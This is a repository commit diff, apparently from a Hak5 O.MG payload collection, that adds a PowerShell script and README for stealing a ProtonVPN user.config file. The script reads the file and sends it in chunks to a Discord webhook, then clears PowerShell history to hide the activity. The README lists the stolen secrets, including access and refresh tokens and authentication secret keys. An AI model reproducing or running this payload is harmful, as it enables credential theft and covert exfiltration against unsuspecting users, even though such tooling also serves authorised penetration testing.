mirror of https://github.com/hak5/omg-payloads.git
script
aleff-github
parent
d7d4431c04
commit
c0cd28c287
|
|
@ -0,0 +1,37 @@
|
|||
$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config"
|
||||
|
||||
$Content = Get-Content -Path $Path
|
||||
|
||||
$text = $Path + $Content
|
||||
|
||||
# Discord Connection
|
||||
$hookurl = "$discord"
|
||||
|
||||
# Loop for Discord
|
||||
$ConstantLimitForRestMethod = 1999
|
||||
$TMP_Body = @{
|
||||
'username' = $env:username
|
||||
'content' = ""
|
||||
}
|
||||
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
|
||||
try {
|
||||
$TMP_Body = @{
|
||||
'username' = $env:username
|
||||
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
|
||||
}
|
||||
} catch [ArgumentOutOfRangeException] {
|
||||
if($text.Length-$i -gt 0){
|
||||
$TMP_Body = @{
|
||||
'username' = $env:username
|
||||
'content' = $text.Substring($i, $text.Length-$i)
|
||||
}
|
||||
} else {
|
||||
break
|
||||
}
|
||||
}
|
||||
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json)
|
||||
}
|
||||
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
|
||||
|
|
@ -0,0 +1,37 @@
|
|||
# ProtonVPN config file ✅
|
||||
|
||||
A script used to stole target ProtonVPN config file.
|
||||
|
||||
**Category**: Credentials, Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
This script will stole target ProtonVPN config file.
|
||||
|
||||
Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
In the config file you can find a lot information about the user like:
|
||||
- UserUid
|
||||
- UserAccessToken
|
||||
- UserRefreshToken
|
||||
- UserAuthenticationPublicKey
|
||||
- UserAuthenticationSecretKey
|
||||
- UserAuthenticationCertificatePem
|
||||
- UserCertificationServerPublicKey
|
||||
- and so on...
|
||||
|
||||
Then it cleans up traces of what you have done after.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* ProtonVPN user logged at least one time
|
||||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
|
||||
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||
|
||||
Loading…
Reference in New Issue